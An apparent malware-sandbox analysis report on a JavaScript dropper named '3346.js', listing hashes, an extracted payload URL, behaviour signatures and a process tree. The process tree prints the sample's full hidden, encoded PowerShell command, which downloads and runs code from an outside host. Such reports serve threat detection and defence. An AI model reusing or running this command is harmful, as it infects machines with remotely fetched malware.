Overview

overview

10

Static

static

3346.js

windows7_x64

10

3346.js

windows10_x64

10

Analysis

  • max time kernel
    11s
  • max time network
    41s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    11-08-2021 13:25

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    3346.js

  • Size

    530KB

  • MD5

    7e23a9a840725f3431ef5825c6ab6839

  • SHA1

    b9f307ac96ded5c42d931f7c4355756164ca0123

  • SHA256

    09eeec589e425f4da6dc1587e49f7f32c17f4c9e026b10c2360e5b3f72699ca7

  • SHA512

    51f027140d19f3b493d91a664d4c8bf2514b38c210f28178948a21d56fcde0ed99a068d7c0d04b9b3012ad03fc5be6e88d8e0f78aeb55bb919a2170a7e47da92

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://erzurum.us/65376345273497600381/tjTyjrjywrdmJoaaenvF/dll/assistant.php

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\3346.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1856
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1492
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1688

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1492-59-0x0000000000000000-mapping.dmp
    Download
  • memory/1688-60-0x0000000000000000-mapping.dmp
    Download
  • memory/1688-61-0x000007FEFBD21000-0x000007FEFBD23000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1688-62-0x0000000001F80000-0x0000000001F81000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1688-63-0x000000001AC10000-0x000000001AC11000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1688-65-0x000000001AB94000-0x000000001AB96000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1688-64-0x000000001AB90000-0x000000001AB92000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1688-66-0x0000000002570000-0x0000000002571000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1688-67-0x0000000001FD0000-0x0000000001FD1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1688-68-0x000000001C230000-0x000000001C231000-memory.dmp
    Filesize

    4KB

    Download